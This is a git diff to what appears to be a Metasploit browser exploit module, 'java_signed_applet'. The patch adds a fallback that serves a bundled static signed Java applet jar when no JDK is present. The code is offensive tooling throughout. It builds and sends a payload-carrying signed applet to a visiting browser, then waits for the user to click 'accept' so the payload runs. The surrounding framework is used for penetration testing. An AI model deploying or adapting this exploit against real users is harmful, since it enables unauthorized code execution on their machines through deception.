diff --git a/data/exploits/java_signed_applet.jar b/data/exploits/java_signed_applet.jar new file mode 100644 index 0000000000..a1410036b5 Binary files /dev/null and b/data/exploits/java_signed_applet.jar differ diff --git a/modules/exploits/multi/browser/java_signed_applet.rb b/modules/exploits/multi/browser/java_signed_applet.rb index 4da6660e11..a32d5eb950 100644 --- a/modules/exploits/multi/browser/java_signed_applet.rb +++ b/modules/exploits/multi/browser/java_signed_applet.rb @@ -113,6 +113,16 @@ class Metasploit3 < Msf::Exploit::Remote # Currently doing all processing in on_request_uri. # If this is too slow, we can move applet generation up here. # + + @use_static = false + + if not @jvm_init + print_error + print_error "JVM not initialized. You must install the Java Development Kit, the rjb ruby gem, and set the $JAVA_HOME variable." + print_error "Falling back to static signed applet. This exploit will still work, but the CERTCN and APPLETNAME variables will be ignored." + print_error + @use_static = true + end super end @@ -374,43 +384,52 @@ public class #{datastore['APPLETNAME']} extends Applet end end - appletcode = get_code(cli) + if not @use_static + appletcode = get_code(cli) - print_status "Compiling applet classes..." - compile( appletcode['classnames'], appletcode['codefiles'] ) + print_status "Compiling applet classes..." + compile( appletcode['classnames'], appletcode['codefiles'] ) - print_status "Compile completed. Building jar file..." + print_status "Compile completed. Building jar file..." - unsignedjar = "unsigned_#{datastore['APPLETNAME']}.jar" - @signedjar = "#{datastore['APPLETNAME']}.jar" + unsignedjar = "unsigned_#{datastore['APPLETNAME']}.jar" + @signedjar = "#{datastore['APPLETNAME']}.jar" - build_jar( unsignedjar, - [ # Applet - datastore['APPLETNAME'] + ".class", - # PayloadX class - datastore['APPLETNAME'] + "$" + datastore['PAYLOADNAME'] + ".class", - # PayloadX StreamConnector for pure Java payload - datastore['APPLETNAME'] + "$" + datastore['PAYLOADNAME'] + "$StreamConnector.class" ] ) - - print_status "Jar built. Signing..." + build_jar( unsignedjar, + [ # Applet + datastore['APPLETNAME'] + ".class", + # PayloadX class + datastore['APPLETNAME'] + "$" + datastore['PAYLOADNAME'] + ".class", + # PayloadX StreamConnector for pure Java payload + datastore['APPLETNAME'] + "$" + datastore['PAYLOADNAME'] + "$StreamConnector.class" ] ) + + print_status "Jar built. Signing..." + + sign_jar( datastore['CERTCN'], unsignedjar, @signedjar ) + + print_status "Jar signed. Ready to send." + else + print_status "Using static, signed jar. Ready to send." + end - sign_jar( datastore['CERTCN'], unsignedjar, @signedjar ) - - print_status "Jar signed. Ready to send." - # TODO: gzip data and parse in java send_response_html( cli, generate_html( data, host, port ), { 'Content-Type' => 'text/html' } ) return end # load the jar file - if File.exists? File.join( datastore['JAVACACHE'], @signedjar ) - path = File.join( datastore['JAVACACHE'], @signedjar ) - fd = File.open( path, "rb" ) + if @use_static + path = File.join( Msf::Config.install_root, "data", "exploits", "java_signed_applet.jar" ) + elsif File.exists? File.join( datastore['JAVACACHE'], @signedjar ) + path = File.join( datastore['JAVACACHE'], @signedjar ) + end + + if path + fd = File.open( path, "rb" ) @jar_data = fd.read(fd.stat.size) fd.close end - + print_status( "Sending #{datastore['APPLETNAME']}.jar to #{cli.peerhost}:#{cli.peerport}. Waiting for user to click 'accept'..." ) send_response( cli, @jar_data, { 'Content-Type' => "application/octet-stream" } )